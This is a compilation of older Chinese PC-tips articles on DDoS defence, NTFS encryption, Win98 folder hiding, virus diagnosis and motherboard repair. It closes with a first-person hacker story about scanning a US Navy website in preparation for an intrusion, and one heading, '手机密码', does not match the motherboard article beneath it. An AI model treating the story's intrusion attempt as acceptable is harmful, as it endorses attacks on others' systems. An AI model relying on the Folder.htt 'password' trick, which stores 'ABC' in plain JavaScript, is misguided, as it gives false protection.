    路由器是网络的核心设备，需要慎重设置，最好修改后，先不保存，以观成效。Cisco路由器有两种配置，startup config和running config，修改的时候改变的是running config，可以让这个配置先运行一段时间，认为可行后再保存配置到startup config；如果不满意想恢复到原来的配置，用copy start run即可。

    不论防火墙还是路由器都是到外界的接口设备，在进行防DDoS设置的同时，要权衡可能相应牺牲的正常业务的代价，谨慎行事。

    利用负载均衡技术：

    就是把应用业务分布到几台不同的服务器上，甚至不同的地点。采用循环DNS服务或者硬件路由器技术，将进入系统的请求分流到多台服务器上。这种方法要求投资比较大，相应的维护费用也高，中型网站如果有条件可以考虑。

    以上方法对流量小、针对性强、结构简单的DoS攻击进行防范还是很有效的。而对于DDoS攻击，则需要能够应对大流量的防范措施和技术，需要能够综合多种算法、集多种网络设备功能的集成技术。

    近年来，国内外也出现了一些运用此类集成技术的产品，如Captus IPS 4000、Mazu Enforcer、Top Layer Attack Mitigator以及国内的绿盟黑洞、东方龙马终结者等，能够有效地抵挡SYN Flood、UDP Flood、ICMP Flood和Stream Flood等大流量DDoS的攻击，个别还具有路由和交换的网络功能。对于有能力的网站来说，直接采用这些产品是防范DDoS攻击较为便利的方法。但不论国外还是国内的产品，其技术应用的可靠性、可用性等仍有待于进一步提高，如提高设备自身的高可用性、处理速率和效率以及功能的集成性等。

    最后，介绍两个当网站遭受DoS攻击导致系统无响应后快速恢复服务的应急办法：

    * 如有富余的IP资源，可以更换一个新的IP地址，将网站域名指向该新IP；

    * 停用80端口，使用如81或其它端口提供HTTP服务，将网站域名指向IP：81。

作者：
来源：天极网


NTFS格式下加、解密问题

《一键清理系统垃圾》

NTFS格式下加、解密问题

    NTFS是WinNT以上版本支持的一种提供安全性、可靠性的高级文件系统。在Win2000和WinXP中，NTFS还可以提供诸如文件和文件夹权限、加密、磁盘配额和压缩这样的高级功能。

    一、加密文件或文件夹
    步骤一：打开Windows资源管理器。
    步骤二：右键单击要加密的文件或文件夹，然后单击“属性”。
    步骤三：在“常规”选项卡上，单击“高级”。选中“加密内容以便保护数据”复选框

  在加密过程中还要注意以下五点：
    1.要打开“Windows 资源管理器”，请单击“开始→程序→附件”，然后单击“Windows 资源管理器”。
    2.只可以加密NTFS分区卷上的文件和文件夹，FAT分区卷上的文件和文件夹无效。
    3.被压缩的文件或文件夹也可以加密。如果要加密一个压缩文件或文件夹，则该文件或文件夹将会被解压。
    4.无法加密标记为“系统”属性的文件，并且位于systemroot目录结构中的文件也无法加密。
    5.在加密文件夹时，系统将询问是否要同时加密它的子文件夹。如果选择是，那它的子文件夹也会被加密，以后所有添加进文件夹中的文件和子文件夹都将在添加时自动加密。

    二、解密文件或文件夹
    步骤一：打开Windows资源管理器。
    步骤二：右键单击加密文件或文件夹，然后单击“属性”。
    步骤三：在“常规”选项卡上，单击“高级”。
    步骤四：清除“加密内容以便保护数据”复选框。

    同样，我们在使用解密过程中要注意以下问题：
    1.要打开“Windows资源管理器”，请单击“开始→程序→附件”，然后单击“Windows资源管理器”。
    2.在对文件夹解密时，系统将询问是否要同时将文件夹内的所有文件和子文件夹解密。如果选择仅解密文件夹，则在要解密文件夹中的加密文件和子文件夹仍保持加密。但是，在已解密文件夹内创立的新文件和文件夹将不会被自动加密。

    以上就是使用文件加、解密的方法！而在使用过程中我们也许会遇到以下一些问题，在此作以下说明：
    1.高级按钮不能用
    原因：加密文件系统(EFS)只能处理NTFS文件系统卷上的文件和文件夹。如果试图加密的文件或文件夹在FAT或FAT32卷上，则高级按钮不会出现在该文件或文件夹的属性中。
    解决方案：
    将卷转换成带转换实用程序的NTFS卷。
    打开命令提示符。
    键入：Convert [drive]/fs:ntfs
    (drive 是目标驱动器的驱动器号)
    2.当打开加密文件时，显示“拒绝访问”消息
   原因：加密文件系统(EFS)使用公钥证书对文件加密，与该证书相关的私钥在本计算机上不可用。
    解决方案：
    查找合适的证书的私钥，并使用证书管理单元将私钥导入计算机并在本机上使用。
    3.用户基于NTFS对文件加密，重装系统后加密文件无法被访问的问题的解决方案(注意：重装Win2000/XP前一定要备份加密用户的证书)：
    步骤一：以加密用户登录计算机。
    步骤二：单击“开始→运行”，键入“mmc”，然后单击“确定”。
    步骤三：在“控制台”菜单上，单击“添加/删除管理单元”，然后单击“添加”。
    步骤四：在“单独管理单元”下，单击“证书”，然后单击“添加”。
    步骤五：单击“我的用户账户”，然后单击“完成”(如图2，如果你加密用户不是管理员就不会出现这个窗口，直接到下一步) 。
    步骤六：单击“关闭”，然后单击“确定”。
    步骤七：双击“证书──当前用户”，双击“个人”，然后双击“证书”。
    步骤八：单击“预期目的”栏中显示“加密文件”字样的证书。
    步骤九：右键单击该证书，指向“所有任务”，然后单击“导出”。
    步骤十：按照证书导出向导的指示将证书及相关的私钥以PFX文件格式导出(注意：推荐使用“导出私钥”方式导出，这样可以保证证书受密码保护，以防别人盗用。另外，证书只能保存到你有读写权限的目录下)。
    4.保存好证书
    注意将PFX文件保存好。以后重装系统之后无论在哪个用户下只要双击这个证书文件，导入这个私人证书就可以访问NTFS系统下由该证书的原用户加密的文件夹(注意：使用备份恢复功能备份的NTFS分区上的加密文件夹是不能恢复到非NTFS分区的)。

    最后要提一下，这个证书还可以实现下述用途：
    (1)给予不同用户访问加密文件夹的权限
    将我的证书按“导出私钥”方式导出，将该证书发给需要访问这个文件夹的本机其他用户。然后由他登录，导入该证书，实现对这个文件夹的访问。
    (2)在其也WinXP机器上对用“备份恢复”程序备份的以前的加密文件夹的恢复访问权限
    将加密文件夹用“备份恢复”程序备份，然后把生成的Backup.bkf连同这个证书拷贝到另外一台WinXP机器上，用“备份恢复”程序将它恢复出来(注意：只能恢复到NTFS分区)。然后导入证书，即可访问恢复出来的文件了。

Win98加密文件夹四法

一、文件夹属性法

    在“Windows资源管理器”窗口，右键单击要加密的文件夹，单击“属性”，选中“隐藏”复选框。在注册表的“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL”分支下，将“CheckedValue”的键值设置为数字“0”。以后，即使在“Windows资源管理器”窗口，单击“查看”菜单中的“文件夹选项”，单击“查看”选项卡，选中“显示所有文件”复选钮，也无法看到具有隐藏属性的文件夹。

二、“回收站”法

    首先确认选中了“显示所有文件”复选钮，并且注册表中“CheckedValue”的键值为“1”。然后，在“Windows资源管理器”窗口，右键单击“C:\RECYCLED”文件夹(这是C盘上“回收站”对应的文件夹)，再单击“属性”，单击“常规”选项卡，清除“启用缩略图方式查看”和“只读”复选框，单击“确定”按钮。关闭并重新启动“Windows资源管理器”后，将会看到“C:\RECYCLED”文件夹中有一个desktop.ini文件。把该文件复制到要加密的文件夹中，并把该文件夹设为“只读”属性。

三、“文件管理器”法

    单击“开始/运行”，键入“winfile”，单击“确定”按钮，打开“文件管理器”窗口，单击“查看”菜单中的“按文件类型”，选中“显示隐藏/系统文件”复选框，单击“确定”按钮。把要加密的文件夹拖到“C:\RECYCLED”文件夹或者其他分区的“RECYCLED”文件夹。这样，在“我的电脑”或“Windows资源管理器”窗口中就看不到这个文件夹了。

四、设置密码法

    1、打开“资源管理器”，选定要加密或要保护的文件夹(文件目录)，在其中空白处单击鼠标右键，选择“自定义文件夹…”选项；
    2、在“自定义文件夹”的复选框中，选择“创建或编辑HTML文档”，并单击“下一步”，系统准备启动HTML编辑器；
    3、单击“下一步”，系统启动HTML编辑器，自动打开Folder.htt文档；
    4、编辑Folder.htt文档，搜索“JavaScript”字符，在下方顶头输入以下3行内容：

    var pass = prompt("请输入密码")

    if(pass != "ABC")

    {window.location="E:"};

    5、保存Folder.htt文档并退出编辑，选择“完成”；到此，对文件夹的加密或保护便已完成；
    6、加密测试，关闭已打开的所有文档及文件夹，重新打开“资源管理器”，点击已加密的文件夹，系统便会提示输入密码，输入正确的密码(本文设定的密码为ABC)就可以访问该文件夹，反之则会转入E盘而无法访问，从而保护该文件夹及其中的文档。


如何判断你的电脑是否含病毒

《一键清理系统垃圾》

如何判断你的电脑是否含病毒

    各种病毒时至今日也可算是百花齐放了，搞得人心惶惶，一旦发现自己的电脑有点异常就认定是病毒在作怪，到处找杀毒软件，一个不行，再来一个，总之似乎不找到"元凶"誓不罢休一样，结果病毒软件是用了一个又一个，或许为此人民币是用了一张又一张，还是未见"元凶"的踪影，其实这未必就是病毒在作怪。

    这样的例子并不少见，特别是对于一些初级电脑用户。下面我就结合个人电脑使用及企业网络维护方面的防毒经验从以下几个方面给大家介绍介绍如何判断是否中了病毒，希望对帮助识别"真毒"有一定帮助！

    病毒与软、硬件故障的区别和联系

    电脑出故障不只是因为感染病毒才会有的，个人电脑使用过程中出现各种故障现象多是因为电脑本身的软、硬件故障引起的，网络上的多是由于权限设置所致。我们只有充分地了解两者的区别与联系，才能作出正确的判断，在真正病毒来了之时才会及时发现。下面我就简要列出了分别因病毒和软、硬件故障引起的一些常见电脑故障症状分析。

    症状 病毒的入侵的可能性 软、硬件故障的可能性

    经常死机：病毒打开了许多文件或占用了大量内存；不稳定（如内存质量差，硬件超频性能差等）；运行了大容量的软件占用了大量的内存和磁盘空间；使用了一些测试软件（有许多BUG）；硬盘空间不够等等；运行网络上的软件时经常死机也许是由于网络速度太慢，所运行的程序太大，或者自己的工作站硬件配置太低。

    系统无法启动：病毒修改了硬盘的引导信息，或删除了某些启动文件。如引导型病毒引导文件损坏；硬盘损坏或参数设置不正确；系统文件人为地误删除等。

    文件打不开：病毒修改了文件格式；病毒修改了文件链接位置。文件损坏；硬盘损坏；文件快捷方式对应的链接位置发生了变化；原来编辑文件的软件删除了；如果是在局域网中多表现为服务器中文件存放位置发生了变化，而工作站没有及时涮新服器的内容（长时间打开了资源管理器）。

    经常报告内存不够：病毒非法占用了大量内存；打开了大量的软件；运行了需内存资源的软件；系统配置不正确；内存本就不够（目前基本内存要求为128M）等。

    提示硬盘空间不够：病毒复制了大量的病毒文件（这个遇到过好几例，有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了，一安装软件就提示硬盘空间不够。硬盘每个分区容量太小；安装了大量的大容量软件；所有软件都集中安装在一个分区之中；硬盘本身就小；如果是在局域网中系统管理员为每个用户设置了工作站用户的"私人盘"使用空间限制，因查看的是整个网络盘的大小，其实"私人盘"上容量已用完了。

    软盘等设备未访问时出读写信号：病毒感染；软盘取走了还在打开曾经在软盘中打开过的文件。

    出现大量来历不明的文件：病毒复制文件；可能是一些软件安装中产生的临时文件；也或许是一些软件的配置信息及运行记录。

    启动黑屏：病毒感染（记得最深的是98年的4.26，我为CIH付出了好几千元的代价，那天我第一次开机到了Windows画面就死机了，第二次再开机就什么也没有了）；显示器故障；显示卡故障；主板故障；超频过度；CPU损坏等等

    数据丢失：病毒删除了文件；硬盘扇区损坏；因恢复文件而覆盖原文件；如果是在网络上的文件，也可能是由于其它用户误删除了。

    键盘或鼠标无端地锁死：病毒作怪，特别要留意"木马"；键盘或鼠标损坏；主板上键盘或鼠标接口损坏；运行了某个键盘或鼠标锁定程序，所运行的程序太大，长时间系统很忙，表现出按键盘或鼠标不起作用。

    系统运行速度慢：病毒占用了内存和CPU资源，在后台运行了大量非法操作；硬件配置低；打开的程序太多或太大；系统配置不正确；如果是运行网络上的程序时多数是由于你的机器配置太低造成，也有可能是此时网路上正忙，有许多用户同时打开一个程序；还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

    系统自动执行操作：病毒在后台执行非法操作；用户在注册表或启动组中设置了有关程序的自动运行；某些软件安装或升级后需自动重启系统。

    通过以上的分析对比，我们知道其实大多数故障都可能是由于人为或软、硬件故障造成的，当我们发现异常后不要急于下断言，在杀毒还不能解决的情况下，应仔细分析故障的特征，排除软、硬件及人为的可能性。

    病毒的分类及各自的特征

    要真正地识别病毒，及时的查杀病毒，我们还有必要对病毒有一番较详细的了解，而且越详细越好！

    病毒因为由众多分散的个人或组织单独编写，也没有一个标准去衡量、去划分，所以病毒的分类可按多个角度大体去分。

    如按传染对象来分，病毒可以划分为以下几类：

    a、引导型病毒

    这类病毒攻击的对象就是磁盘的引导扇区，这样就能使系统在启动时获得优先的执行权，从而达到控制整个系统的目的，这类病毒因为感染的是引导扇区，所以造成的损失也就比较大，一般来说会造成系统无法正常启动，但查杀这类病毒也较容易，多数杀毒软件都能查杀这类病毒，如KV300、KILL系列等。

    b、文件型病毒

    早期的这类病毒一般是感染以exe、com等为扩展名的可执行文件，这样的话当你执行某个可执行文件时病毒程序就跟着激活。近期也有一些病毒感染以dll、ovl、sys等为扩展名的文件，因为这些文件通常是某程序的配置、链接文件，所以执行某程序时病毒也就自动被子加载了。它们加载的方法是通过插入病毒代码整段落或分散插入到这些文件的空白字节中，如CIH病毒就是把自己拆分成9段嵌入到PE结构的可执行文件中，感染后通常文件的字节数并不见增加，这就是它的隐蔽性的一面。

    c、网络型病毒

    这种病毒是近几来网络的高速发展的产物，感染的对象不再局限于单一的模式和单一的可执行文件，而是更加综合、更加隐蔽。现在一些网络型病毒几乎可以对所有的OFFICE文件进行感染，如WORD、EXCEL、电子邮件等。其攻击方式也有转变，从原始的删除、修改文件到现在进行文件加密、窃取用户有用信息（如黑客程序）等，传播的途经也发生了质的飞跃，不再局限磁盘，而是通过更加隐蔽的网络进行，如电子邮件、电子广告等。

    d、复合型病毒

    把它归为"复合型病毒"，是因为它们同时具备了"引导型"和"文件型"病毒的某些特点，它们即可以感染磁盘的引导扇区文件，也可以感染某此可执行文件，如果没有对这类病毒进行全面的清除，则残留病毒可自我恢复，还会造成引导扇区文件和可执行文件的感染，所以这类病毒查杀难度极大，所用的杀毒软件要同时具备查杀两类病毒的功能。

    以上是按照病毒感染的对象来分，如果按病毒的破坏程度来分，我们又可以将病毒划分为以下几种：

    a、良性病毒：

    这些病毒之所以把它们称之为良性病毒，是因为它们入侵的目的不是破坏你的系统，只是想玩一玩而已，多数是一些初级病毒发烧友想测试一下自己的开发病毒程序的水平。它们并不想破坏你的系统，只是发出某种声音，或出现一些提示，除了占用一定的硬盘空间和CPU处理时间外别无其它坏处。如一些木马病毒程序也是这样，只是想窃取你电脑中的一些通讯信息，如密码、IP地址等，以备有需要时用。

    b、恶性病毒

    我们把只对软件系统造成干扰、窃取信息、修改系统信息，不会造成硬件损坏、数据丢失等严重后果的病毒归之为"恶性病毒"，这类病毒入侵后系统除了不能正常使用之外，别无其它损失，系统损坏后一般只需要重装系统的某个部分文件后即可恢复，当然还是要杀掉这些病毒之后重装系统。

    c、极恶性病毒

    这类病毒比上述b类病毒损坏的程度又要大些，一般如果是感染上这类病毒你的系统就要彻底崩溃，根本无法正常启动，你保分留在硬盘中的有用数据也可能随之不能获取，轻一点的还只是删除系统文件和应用程序等。

    d、灾难性病毒

    这类病毒从它的名字我们就可以知道它会给我们带来的破坏程度，这类病毒一般是破坏磁盘的引导扇区文件、修改文件分配表和硬盘分区表，造成系统根本无法启动，有时甚至会格式化或锁死你的硬盘，使你无法使用硬盘。如果一旦染上这类病毒，你的系统就很难恢复了，保留在硬盘中的数据也就很难获取了，所造成的损失是非常巨大的，所以我们进化论什么时候应作好最坏的打算，特别是针对企业用户，应充分作好灾难性备份，还好现在大多数大型企业都已认识到备份的意义所在，花巨资在每天的系统和数据备份上，虽然大家都知道或许几年也不可能遇到过这样灾难性的后果，但是还是放松这"万一"。我所在的雀巢就是这样，而且还非常重视这个问题。如98年4.26发作的CIH病毒就可划归此类，因为它不仅对软件造成破坏，更直接对硬盘、主板的BIOS等硬件造成破坏。

    如按其入侵的方式来分为以下几种：

    a、源代码嵌入攻击型

    从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序，病毒是在源程序编译之前插入病毒代码，最后随源程序一起被编译成可执行文件，这样刚生成的文件就是带毒文件。当然这类文件是极少数，因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序，况且这种入侵的方式难度较大，需要非常专业的编程水平。

    b、代码取代攻击型

    这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块，这类病毒也少见，它主要是攻击特定的程序，针对性较强，但是不易被发现，清除起来也较困难。

    c、系统修改型

    这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能，由于是直接感染系统，危害较大，也是最为多见的一种病毒类型，多为文件型病毒。

    d、外壳附加型

    这类病毒通常是将其病毒附加在正常程序的头部或尾部，相当于给程序添加了一个外壳，在被感染的程序执行时，病毒代码先被执行，然后才将正常程序调入内存。目前大多数文件型的病毒属于这一类。

    有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒，要知道这些我们可以按以下几个方法来判断。

    1、反病毒软件的扫描法

    这恐怕是我们绝大数朋友首选，也恐怕是唯一的选择，现在病毒种类是越来越多，隐蔽的手段也越来越高明，所以给查杀病毒带来了新的难度，也给反病毒软件开发商带来挑战。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及，病毒的开发和传播是越来越容易了，因而反病毒软件开发公司也是越来越多了。但目前比较有名的还是那么几个系统的反病毒软件，如金山毒霸等。至于这些反病毒软件的使用在此就不必说叙了，我相信大家都有这个水平！

    2、观察法

    这一方法只有在了解了一些病毒发作的症状及常栖身的地方才能准确地观察到。如硬盘引导时经常出现死机、系统引导时间较长、运行速度很慢、不能访问硬盘、出现特殊的声音或提示等上述在第一大点中出现的故障时，我们首先要考虑的是病毒在作怪，但也不能一条胡洞走到底，上面我不是讲了软、硬件出现故障同样也可能出现那些症状嘛！对于如属病毒引起的我们可以从以下几个方面来观察：

    a、内存观察

    这一方法一般用在DOS下发现的病毒，我们可用DOS下的"mem/c/p"命令来查看各程序占用内存的情况，从中发现病毒占用内存的情况（一般不单独占用，而是依附在其它程序之中），有的病毒占用内存也比较隐蔽，用"mem/c/p"发现不了它，但可以看到总的基本内存640K之中少了那么区区1k或几K。

    b、注册表观察法

    这类方法一般适用于近来出现的所谓黑客程序，如木马程序，这些病毒一般是通过修改注册表中的启动、加载配置来达到自动启动或加载的，一般是在如下几个地方实现：

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion

    等等，具体可参考我的另一篇文章--《通通透透看木马》，在其中对注册表中可能出现的地方会有一个比较详尽的分析。

    c、系统配置文件观察法

    这类方法一般也是适用于黑客类程序，这类病毒一般在隐藏在system.ini 、wini.ini（Win9x/WinME）和启动组中，在system.ini文件中有一个"shell="项，而在wini.ini文件中有"load= "、"run= "项，这些病毒一般就是在这些项目中加载它们自身的程序的，注意有时是修改原有的某个程序。我们可以运行Win9x/WinME中的msconfig.exe程序来一项一项查看。具体也可参考我的《通通透透看木马》一文。

    d、特征字符串观察法

    这种方法主要是针对一些较特别的病毒，这些病毒入侵时会写相应的特征代码，如CIH病毒就会在入侵的文件中写入"CIH"这样的字符串，当然我们不可能轻易地发现，我们可以对主要的系统文件（如Explorer.exe)运用16进制代码编辑器进行编辑就可发现，当然编辑之前最好还要要备份，毕竟是主要系统文件。

    e、硬盘空间观察法

    有些病毒不会破坏你的系统文件，而仅是生成一个隐藏的文件，这个文件一般内容很少，但所占硬盘空间很大，有时大得让你的硬盘无法运行一般的程序，但是你查又看不到它，这时我们就要打开资源管理器，然后把所查看的内容属性设置成可查看所有属性的文件（这方法应不需要我来说吧？），相信这个庞然大物一定会到时显形的，因为病毒一般把它设置成隐藏属性的。到时删除它即可，这方面的例子在我进行电脑网络维护和个人电脑维修过程中见到几例，明明只安装了几个常用程序，为什么在C盘之中几个G的硬盘空间显示就没有了，经过上述方法一般能很快地让病毒显形的。


手机密码

《一键清理系统垃圾》

手机密码

  主板是负责连接电脑配件的桥梁，其工作的稳定性直接影响着电脑能否正常运行。由于它所集成的组件和电路多而复杂，因此产生故障的原因也相对较多。

    主板故障的确定，一般通过逐步拔除或替换主板所连接的板卡（内存、显卡等），先排除这些配件可能出现的问题后就可以把目标锁定在主板上。另外，主板故障往往表现为系统启动失败、屏幕无显示等难以直观判断的故障现象。以下，笔者仅介绍一些常见的、易操作的故障的判断，对于一些电路、电气故障的问题，因需要借助专业的维修诊断工具加之笔者的能力有限，不能列举，在此表示抱歉。

    1、与主板驱动有关

    主板驱动丢失、破损、重复安装会引起操作系统引导失败或造成操作系统工作不稳的故障，可依次打开“控制面板--系统--设备管理器”检查一下“系统设备”中的项目是否有黄色惊叹号或问号。将打黄色惊叹号或问号的项目全部删除（可在“安全模式”下进行操作），重新安装主板自带的驱动，重启即可。例如，采用Intel芯片组的主板要安装“Intel Chipset Software Installation Utility”主板驱动程序，采用VIA芯片组的主板需安装“4 In 1”驱动，以取得更好的稳定性和兼容性。

    2、接触不良、短路等

    主板的面积较大，是聚集灰尘较多的地方。灰尘，很可能会引发插槽与板卡接触不良的现象，这时我们可以对着插槽吹吹气，去除灰尘。如果是由于插槽引脚氧化而引起接触不良的，可以将有硬度的白纸折好（表面光滑那面向外），插入槽内来回擦拭。另外，CPU插槽内用于检测CPU温度或主板上用于监控机箱内温度的热敏电阻上附上了灰尘的话，很可能会造成主板对温度的识别错误，从而引发主板保护性故障的问题，在清洁时也需要注意。

    拆装机箱时，不小心掉入的诸如小镙丝之类的导电物可能会卡在主板的元器件之间从而引发短路现象，会引发“保护性故障”。另外，检查主板与机箱底板间是否因少装了用于支撑主板的小铜柱；是否主板安装不当或机箱变形而使主板与机箱直接接触，使具有短路保护功能的电源自动切断电源供应。

    3、和主板电池有关

    当遇到：电脑开机时不能正确找到硬盘、开机后系统时间不正确、CMOS设置不能保存等现象时，可先检查主板CMOS跳线是否设为清除“CLEAR”选项（一般是2-3），如果是这样的话，请将跳线改为“NORMAL”选项（一般是1-2）然后重新设置。如果不是CMOS跳线错误，就很可能是因为主板电池损坏或电池电压不足造成的，请换个主板电池试试

4、兼容性问题

    遇到由于主板设计上的BUG或升级配件时出现的新旧事物兼容性问题的情况（可参考前几期的《**故障应该怎样判断》的文章，先试着排除），在排除BIOS设置的问题后可以下载主板的最新BIOS进行刷新。另外，笔者还遇到过升级操作系统而引起的兼容性问题后来确定和主板BIOS陈旧所致。

    技巧一：清除CMOS设置，也可以解决一些“莫名其妙”的故障，大家不妨试试。
    技巧二：当安装的硬件不能被操作系统识别时，将CMOS设置的"PNP OS INSTALLED"（即插即用）项目设成“YES”或“NO”，试试。

    5、主板北桥芯片散热效果不佳造成

    有些主板将北桥芯片上的散热片省掉了，这可能会造成芯片散热效果不佳导致系统运行一段时间后死机。遇到这样的情况，可自制散热片安上或加个散热效果好的机箱风扇。

    6、主板电容失效引起的

    主板上的铝电解电容（一般在CPU插槽周围），其内部采用了电解液由于时间、温度、质量等方面的原因，会使它发生“老化”现象，这会导致主板抗干扰指标的下降影响机子正常工作。我们可以购买与“老化”容量相同的电容，准备好电烙铁、焊锡丝、松香后，将“老化”的替换即可。另外，拆装电脑时工具的失落也有可能不小心将电容砸坏，也应检查排除。

    7、BIOS受损

    由于BIOS刷新失败或CIH病毒造成的BIOS受损的问题，如果引导块（Award BIOS中称为BIOS Boot Block、Phoenix BIOS中称为Flash Recover boot Block）未被破坏，可用自制的启动盘进行重新刷新BIOS（具体方法可以参考本站的相关文章，这里就不再赘述），假如引导块也损坏的话，可用热插拔法（很危险）或用利用编程器进行安全的修复。如果您手中无编程器的话，笔者推荐到http://diybios.51.net/网站上去看看，那里有BIOS代写业务。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


网络时代的病毒浅释

《一键清理系统垃圾》

网络时代的病毒浅释

   电脑病毒是当今网络业发展的最大危害，通过电子邮件这个传播途径，随时都有可能让用户的整个电脑系统陷于瘫痪。据统计，在美国，每400封电子邮件中，就有一封可能携带病毒。据“Security Portal”的报告，排在1999年计算机安全问题第一位的就是计算机病毒事件，而与计算机病毒相关的黑客问题也在其中占有相当大的比例。从计算机病毒的表现分析计算机病毒有以下新特点：
1、种类、数量激增
   近年来由于互联网的发展，出现了许多新一代的基于互联网传播的计算机病毒种类，比如包含恶意ActiveX Control和Java Applets的网页、电子邮件计算机病毒、蠕虫、木马等黑客程序。最近甚至出现了专门针对手机和掌上电脑的计算机病毒。同时，计算机病毒的数量也在急剧增加，据最新统计，现在每天有超过40种新计算机病毒出现，因此每年就有1.2万种左右的新计算机病毒出现，这个数目超过了截至1997年为止世界上计算机病毒的总数。
2、传播途径更多，传播速度更快
   最初，计算机病毒的传播介质主要是软盘、硬盘等可移动磁盘，传播途径和方式相对简单。但随着电脑、网络等新技术的发展，现在计算机病毒已经可以通过包括大容量移动磁盘（ZIP、JAZ）、光盘、网络、Internet、电子邮件等多种方式传播，而且仅Internet的传播方式又包括网页浏览、IRC聊天、FTP下载、BBS论坛等。
3、电子邮件成为主要传播媒介
   电子邮件已经成为计算机病毒传播的主要媒介，其比例占所有计算机病毒传播媒介的56%。由于电子邮件可附带任何类型的文件，因此，几乎所有类型的计算机病毒都可通过它来进行快速传播，事实上，还有一些电子邮件病毒根本就没有附件，它本身是一个HTML。不久前出现的名为“BubbleBoy”的计算机病毒无需用户打开附件就能够感染文件，如果用户的邮件可自动打开HTML格式的邮件，则该计算机病毒就会立刻感染用户的系统。
4、造成的破坏日益严重
   CIH计算机病毒在全球造成的损失据估计超过10亿美元，而受2000年5月“I Love You”情书病毒的影响，全球的损失预计更是高达100亿美元。而对于行业的用户，系统每死机一小时，包括证券公司、信用卡公司、电视机构、国际航运公司、邮购公司在内，其损失都在650万美元以上，而对于Internet公司，尚无人能统计其损失。
   针对以上计算机病毒的新特性我们提醒广大电脑使用者千万不要怀有侥幸心理，认为病毒离自己很遥远。安装一个多层次的防卫系统，并及时进行升级将至关重要


我是一个黑客

《一键清理系统垃圾》

我是一个黑客

这几天眼睛要好受些了，因为刚买了一个15’的液晶显示器。也许你会觉得我以前的那个特丽珑的17"的显示器应该很威风才对。呵呵，对一个整天15个小时以上坐在显示器面前，距离不超过30厘米的人来说，那个CRT显示器绝对是一个祸害！眼睛红肿，布满血丝，头发脱落，食欲不振，出门还特别怕光，这些都和那个CRT显示器绝对脱不了关系。
    分析这个攻击目标已经1个多星期了，但是一点进展都没有。不过，我倒是不心急，偶尔还上上聊天室，和MM们调笑一番。但是，脑子里面其实都在想，***，难道真的就没有漏洞吗？
    要攻破一个比较专业的网站，哪里有那么容易？人家的网管难道都是傻子？这个世界其实谁也不比谁傻多少。计算机的知识就那么点东西，学懂的人其实都明白就那么个玩意，别看现在新的名词一堆一堆的，其实，说白了，里面的东西和十年前的东西差别不大，尤其对我们这些专门进攻别人网站，在我们眼里，任何程序都是一条一条的汇编指令的人来说，更是差别不大。 无聊地在网上逛，随便进入一个论坛，随便这么一看，就看到一个帖子，也许天生对黑客的东西敏感，随便这么一看，看到的不是别的东西，就是这么一个帖子：3分钟黑掉一个网站。一个“牛人”在上面详细说明了自己如何在3分钟攻入一台计算机。后面很多赞誉的回帖。这位老兄俨然就是一个“黑客”高手形象了。
    呵呵，我禁不住笑起来。这种东西网上实在太多了。现在很多人对“黑客”感觉非常神秘，包括不少的专业人员在内，加上一帮“计算机盲”导演的渲染，“黑客”这个东西几乎成了无所不能，抬高自己身价的“法宝”了。你现在说自己懂计算机，根本就没人“鸟”你；懂计算机的人随便在街上一抓，10个有9个都懂，还有一个是“计算机高手”。但是你只要说自己是“黑客”，那么很多人就会对你非常另眼相看了。唉，现在就这么奇怪。都是那帮“计算机盲”的导演害的。
    再看那位发帖子的老兄，原来对方没有设置密码。哈哈，亏他还口若悬河的说那么多东西，什么上传程序了，什么远程登陆了，什么连接啦，什么后门啦。唯独，破译密码那一步，他只是略微带了一下，就几个字，密码为空！但是我还是注意到了。我开始大笑起来。哈哈，管理员密码都没有设，是个懂计算机的人都应该晓得，如果人家设置了密码，你那些步骤有屁用呀。知道了密码，后面的那些东西就是网络操作课程中的东西了。跟“黑客”有个屁的关系呀！哈哈哈。。。。。。。
    我在网上从来不敢说自己是“黑客”。并不是怕别人知道我黑过不少网站。我其实是怕人家给我要求去黑某某网站，到时候我下不来台。比如面对一个可爱MM的哀求，你如何回答，答应吧，你以为黑一个网站就像知道了1＋3＝4，就可以到处用这么简单呀？任何一个网站在破译之前，任何一个黑客都不敢事前就说自己能成功，除非他早就把那个网站黑掉了；不答应吧，mm会说：哼，还说自己是黑客，光说不练，看来是个骗子。。。。。。这对我刚刚树立起来的光辉形象，岂不是致命打击！黑客其实成功就*运气和毅力，当然技术功底也是比较重要的。无聊，这些帖子我每次都是第一眼看到，然后漂一眼就知道内容了。然后就沉默的离开，当然有时候还是忍不住的笑。不过看的太多，笑的时候越来越少了，不过，今天我还是笑了，那个“牛人”确实比较可爱。呵呵。。。。。。
    脑子里面还是在想我的那个目标，美国海军一个军方网站。我已经扫描过很多次了。他们用的apache最新版本作的http server。采用的是unix，具体说像是sco unix，版本从反馈的信息看应该是7.0的scounixware。但是我知道这个也不一定准确。现在修改版本来让你认识错误是比较流行的方法。端口开了80，21和20，然后就是远程登陆管理的4410的端口就四个。***，美国鬼子海军中还是有能人，基本就把你的念头断了。21和20显然是用来作FTP的，他用的FTP的服务程序，居然是vsftp1.2版本。*！就是那个号称世界上最稳定和最安全的ftp服务器。vs的意思就是very security 的意思。从名字看你就可以知道有多厉害了。说实话，这个玩意别看很小，功能也不是很强大，但是安全性真是不是吹的。现在网上还没有公开过这个能攻破这个vs的记录。我以前多次遇到过，都没有成功，都是从其他方面想的办法，现在又遇到这个玩意了。看来对方的管理员也是一个内行。
    apache是世界上使用最广泛的http server。要攻破它也是几乎不可能的。无数的高手的实践证明这个绝对是一个很硬的骨头。我不是神仙。我只是一个普通人，并不比人家多一个脑袋，不管你是否觉得会影响我的形象。不过我还是老实告诉你，我也没有办法。其实一般的unix和linux主机都会留下远程登陆的口子，但是你没有密码，还是没用。什么，破译密码，呵呵，你以为这是email信箱呀。
    这些管理员的密码可以说是前无古人后无来者，能让你猜出来？况且，登陆三次不对，就不会给你连接了。
